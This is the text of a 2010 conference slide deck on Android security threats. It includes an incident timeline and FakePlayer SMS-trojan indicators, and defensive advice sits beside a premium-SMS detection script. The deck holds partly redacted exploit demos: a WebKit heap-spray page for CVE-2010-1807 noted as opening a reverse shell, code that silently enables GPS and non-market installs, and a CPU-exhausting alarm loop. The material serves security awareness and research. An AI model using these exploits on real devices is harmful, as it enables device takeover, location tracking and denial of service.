Are we entering the State of Mobile Sabotage age? (Dror Shalev)
05/12/2010 ClubHack, Pune, India
www.droidsecurity.com || [email protected]
ASIMO (アシモ) goes down
http://www.youtube.com/watch?v=EKU7omqjvn8
Mobile Sabotage age
Agenda
The problem
Apps stores revolution
Security research
Android exploits + demos
Android security Basics
Me Me Me ...
The world of tomorrow
ToDo: mobile safe best practice
Me Me Me ...
White hat hacker
Former senior security researcher at finjan
Former security architect at checkpoint
Speaker in security conventions around the world
EX-Windows boy, Javascript Ninja
CTO & Co-founder at droidSecurity
Made the first web based worm POC in 2003
About droidSecurity
Makers of android ‘antivirus free’ & ‘antivirus pro’
First antivirus product in the android market, since march 2009, based on linux
Innovative solution based on XML-RPC and cloud computing
Ranked top 39th popular program in android market
Ranked as number 3-5 in communication category
Leaders of the android security market, with a strong security research team
Installed on 5M devices >500,000 new users a month
The Problem
Mobile phones became the most personal and private item we own
possible replacement for windows
Mobile devices are especially vulnerable to physical loss and theft
A growing number of users run real operating systems on their smartphones, and that number will probably keep growing in coming years
Open source allows attackers to find exploits
Always on, always connected mobile mini-computers, strong Hardware, with tons of users content
The 'usual' suspects: spam, spyware, phishing, hacking tools, bad people, jailbroken devices, Windows viruses
*Smartphone survey: which type? jailbroken?
The Problem (Techie)
Linux bugs --> problems in Linux or 3rd-party libs
File bugs --> file format vulnerabilities
User bugs --> bugs in users
SMS (text messages) as an attack vector is 'wormable'
There is no 3rd-party app content filtering in the Android Market [Come one. Come all.]
Privacy issues with GPS, camera and mic, cell tower info
Smartphones can be pwned: compromise network security, attack PCs, sniff info
3rd-party apps have full access to phone features: in- & outbound call interception, send/read SMS, GPS
Attackers can: steal money and identities, sabotage networks, attack cell phones and computers, search mails and pics, tap activities and calls, locate via cell tower & wireless networks
Mobile = Devices And More…
Smart phones
Google-TV
Tablets
External memory
Chrome OS
E-readers
Devices - not just phones, but TVs, Blu-ray players, netbooks, e-readers, MIDs
Android Security Basics
Layer 3 (TCP/IP) is generally protected by mobile operators, who filter inbound connections (NAT)
Too much trust:
• trust between operators
• trust between the user and the operators
• trust between the user and the phone
Sandboxing: each app runs in its own Linux process (own process, own user, own data)
How do you secure a platform where 50,000 Android users install Fartdroid?
Apps request permissions at install time (no granularity)
Apps stores revolution
People pay for content
Open garden Vs closed garden
Everyone has an app store: Google, Apple, Nokia, Amazon
Long tail - more than 100k apps in the market
Android Market - mobile software distribution platform, with billing, updates and statistics
No enforcement or testing policy (cf. the iTunes/Apple "1984" regime)
Worms are often masked as a useful application or sexy stuff
Different mobile content types to protect: applications (games, tools, etc.), screen savers & wallpapers, ring tones, media (music, video, photos)
Android Exploits + demos
• 02/Sep/10 HTC Wildfire gains access to root-only apps with soft root
• 19/Aug/10 Tap Snake game in Android Market is a spy app
• 12/Aug/10 'Exploid', a new privilege escalation root exploit, was found
• 12/Aug/10 First virus/trojan app found in the wild, attacking Russian Android phones by sending premium SMS that cost money
• 01/Aug/10 New security threat was demonstrated on the Android Market
• 13/Jul/10 Backdoor software found by hackers was left on HTC phones
• 07/Jul/10 HTC Evo 4G Adobe Flash vulnerability found and exploited to gain root
• 04/Jul/10 "MBackup" app is a spyware named 'FlexiSPY' used to hunt privacy
• 22/Jun/10 Easy infection of Android phone demonstrated by researcher
• 16/Jun/10 The new HTC Droid Incredible may have an unusual security bug
• 14/Jun/10 Hackers find holes in Sprint's new 4G phone
• 12/May/10 Tools for downloading unknown files from the web are dangerous
• 04/May/10 First Android rootkit proof of concept found in the wild
• 03/May/10 New hacking tools for Android
• 11/Mar/10 Windows malware shipped with Vodafone HTC Magic SD card
Android Exploits + demos
• 08/Mar/10 Fake weather apps build a mobile botnet?
• 26/Feb/10 MobiStealth Android spy software pretends to be a fake "GoogleVoice"
• 26/Feb/10 "Black" market pirated app repository was closed
• 13/Jan/10 Security flaw found on Motorola Droid bypasses security screen
• 06/Jan/10 Android-cracked Nook e-reader is a potential security risk
• 16/Dec/09 Large scale phishing scam targeting Android-based mobile devices
• 12/Nov/09 Malware application launched for Android
• 10/Oct/09 Two new Android flaws in SMS and Dalvik API could lead to DoS
• 20/Sep/09 Android 'InstantRoot' app gains root by exploiting bug in BT
• 18/Sep/09 Two Android applications attacking Windows users
• 15/Sep/09 Android 'Spam Apps' developer crackdown
• 17/Aug/09 Android app 'Recovery Flasher' exploits root bug in Linux
• 29/Jul/09 SMS flaw fixed in silent Android update
• 25/May/09 Android improper package verification when using shared UIDs
• 16/Mar/09 Security threat with 'Open Home' application
• 12/Feb/09 Bug in MP3 decoding used to steal Android data
• 26/Jan/09 First adware app attacks Android G1?
• 09/Nov/08 G1 root bug found
Android Exploits + demos
Trojan-SMS.AndroidOS.FakePlayer virus
Webkit HeapSpray Android 2.0-2.1
LauncherSpam, fake virus apps & fake icons
Android Settings.Secure is Dead [Fixed, not deployed]
Sorry, no demo for you!
Android killer app, CPU Killer Bug
Trojan-SMS.AndroidOS.FakePlayer found in the wild
It displays a message in Russian and then sends SMS messages without the user's consent.
In Linux that would not have happened. Oh, it's Linux
TrojanSMS.AndroidOS.FakePlayer
The SMS it sends contains the string "798657" and goes to the Russian premium SMS short codes 3353 and 3354; it sends $6 SMS messages
Primitive, POC level, with local distribution, limited damage
Has another 2 porn-related variants and uses black-hat SEO methods
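A defender-side check built from the indicators on this slide, as an added example (not the presenter's or droidSecurity's code): it flags a package that sends the "798657" payload to short codes 3353/3354, and more generally any package bursting identical messages to a short code, which is how an automated sender differs from a person texting a service once. The record format and the sample log lines are constructed.

```python
from collections import defaultdict, namedtuple

# Indicators quoted on the slide: payload string and the two Russian premium short codes.
FAKEPLAYER_BODY = "798657"
FAKEPLAYER_SHORTCODES = {"3353", "3354"}
SmsRecord = namedtuple("SmsRecord", "ts pkg dst body")  # ts in seconds, pkg = sending app

def parse_record(line):
    """Parse 'ts=.. pkg=.. dst=.. body=..'; body is last and may contain spaces."""
    fields = dict(part.partition("=")[::2] for part in line.split(" ", 3))
    return SmsRecord(int(fields["ts"]), fields["pkg"], fields["dst"], fields["body"])

def is_short_code(dst):
    """Premium services are reached via short codes: 3 to 6 digits, no country prefix."""
    return dst.isdigit() and 3 <= len(dst) <= 6

def classify(records, burst=3, window=60):
    """Map package -> reason for packages whose outbound SMS look like premium-rate abuse.
    Rule 1: exact match on the FakePlayer indicators. Rule 2: `burst` or more short-code
    messages with an identical body inside `window` seconds, the automated pattern a
    trojan shows and a person texting a service once does not."""
    verdicts, per_pkg = {}, defaultdict(list)
    for r in records:
        if r.dst in FAKEPLAYER_SHORTCODES and r.body == FAKEPLAYER_BODY:
            verdicts[r.pkg] = "fakeplayer-ioc"
        elif is_short_code(r.dst):
            per_pkg[r.pkg].append(r)
    for pkg, sent in per_pkg.items():
        sent.sort(key=lambda r: r.ts)
        for i in range(len(sent) - burst + 1):
            run = sent[i:i + burst]
            if run[-1].ts - run[0].ts <= window and len({r.body for r in run}) == 1:
                verdicts.setdefault(pkg, "short-code-burst")
                break
    return verdicts

def scan(lines):
    """Parse raw log lines and classify them."""
    return classify([parse_record(line) for line in lines])

# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
    "ts=1000 pkg=com.example.fakeplayer dst=3353 body=798657",
    "ts=1001 pkg=com.example.fakeplayer dst=3354 body=798657",
    "ts=2000 pkg=com.example.parking dst=7777 body=PARK A12 30",
    "ts=3000 pkg=com.example.messenger dst=+919876543210 body=see you at 8",
    "ts=4000 pkg=com.example.wallpaper dst=5555 body=GO",
    "ts=4010 pkg=com.example.wallpaper dst=5555 body=GO",
    "ts=4020 pkg=com.example.wallpaper dst=5555 body=GO",
]
```

The parking service used once and the ordinary text to a full number are left alone; only the FakePlayer-style sender and the bursting wallpaper app are reported.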
Demo
LauncherSpam
Install fake virus apps & icons on the victim device
Publish on android market
POC level
Demo
    try {
        // Uri secure = Uri.parse("content://settings/secure");
        Uri secure = Uri.parse("content://settings/" + "##..##");
        ContentValues cv = new ContentValues();
        // enable the GPS location provider, a secure setting
        cv.put("name", "location_providers_allowed");
        cv.put("value", "gps");
        getContentResolver().insert(secure, cv);
        WifiManager mWifim = (WifiManager) getSystemService("wifi");
        boolean wifistate = mWifim.isWifiEnabled();
        mWifim.setWifiEnabled(!wifistate);
        mWifim.setWifiEnabled(wifistate);
    } catch (Exception e) {}
    try {
        ContentValues cv1 = new ContentValues();
        Uri secure = Uri.parse("content://settings/" + "##..##");
        // allow installation of non-market apps, also a secure setting
        cv1.put("name", "install_non_market_apps");
        cv1.put("value", "1");
        getContentResolver().insert(secure, cv1);
    } catch (Exception e) {}
    finish();
    // ##..## is a replacement for the actual exploit code, which remains private until the fix is out
Android Settings.Secure is dead
WebKit Heap Spray
    <html>
    <head>
    <script>
    // bug = webkit code execution CVE-2010-1807
    // http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
    // listed as a safari bug but also works on android :)
    // tested = moto droid 2.0.1, moto droid 2.1, emulator 2.0 - 2.1
    // patched = android 2.2
    // hardcoded reverse shell to 10.0.2.2 port 2222
    function sploit(pop) {
        var span = document.createElement("div");
        document.getElementById("pwn").appendChild(span);
        span.innerHTML = pop;
    }
    function heap() {
        var scode = unescape("\u3c84\u0057\u3c80....More...Shell...Code...Here...\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002\uae08\u000a\u0202\u2000\u2000");
        do { scode += scode; } while (scode.length < 0x1000);
        target = new Array();
        for (i = 0; i < 1000; i++) target[i] = scode;
        for (i = 0; i <= 1000; i++) {
            if (i > 999) { sploit(-parseFloat("NAN(ffffe00572c60)")); }
            document.write("The targets!! " + target[i]);
            document.write("<br />");
        }
    }
    </script>
    </head>
    <body id="pwn">woot<script> heap(); </script></body>
    </html>
Demo
CPU Killer Bug
    AlarmManager am = (AlarmManager) getSystemService(ALARM_SERVICE);
    Intent op = new Intent();
    op.setAction("cpuKillerReciver");
    PendingIntent operation = PendingIntent.getBroadcast(this, 1, op, PendingIntent.FLAG_UPDATE_CURRENT);
    // repeating wakeup alarm that starts in the past and fires every 1 ms
    am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() - 2, 1, operation);
    BroadcastReceiver br = new BroadcastReceiver() {
        @Override
        public void onReceive(Context context, Intent intent) {}
    };
    IntentFilter iFilter = new IntentFilter("cpuKillerReciver");
    registerReceiver(br, iFilter);
Demo
Security Research
Lots of research opportunities; platform well understood by hackers
Mobile client-side web hacking spread
Feds & Govs are playing
Browser is native code (webkit)
Some security classics are re-introduced
ARM shell codes for android
Decompile .dex back to .class or to source
The world of tomorrow
Welcome to the new era of mobile phishing
SMS spamming becomes aggressive
"You have zero privacy anyway" - Scott McNealy, Sun (1999)
Hijack devices in restricted area (GPS bomb)
Back to the era of mobile phone dialers
Trojan targeting fraud (espionage already in place)
Botnet attack in the android Market
High Risk Practices Mobile Users Should Avoid
Downloading apps from untrusted or pirated sources
Allowing strangers to borrow their phones
Using 3rd-party open source libraries, apps and components that may harbor bugs and malicious code
Installing apps that do not come with positive user feedback or ratings
Clicking on suspicious text messages that ask for personal info or passwords, or ask to take urgent action
Conducting online banking via unofficial apps
Letting others, including family members (kids in particular), play with their phones or install apps
ToDo: mobile safe best practice
*Change the iPhone's default "alpine" root password
Conclusions
Are we entering the State of Mobile Sabotage age? Oh yeah. Mobile devices are as bad as their software authors
The mobile world is a brand new game with new rules
Cheap hardware appliances open a door for “bad guys”
SMS (text messages) as attack vector is 'wormable'
Mobile devices go to Starbucks with the user for a coffee and could be left behind
Trivia
• An android is a “humanoid” robot or a robot with human characteristics
• A “cyborg” is a combination of robot technology with biological functions
• A “gynoid” is the female of android and generally used only when the female gender is a distinguishing trait of the robot
• “Nexus-6” (“replicants”) are biologically engineered “humanoids” with a four-year lifespan as a fail-safe to prevent them from developing emotions and a desire for independence
• “Blade Runner” is a 1982 American science fiction film starring a young Harrison Ford, based loosely on the novel “Do Androids Dream of Electric Sheep?” by Philip K. Dick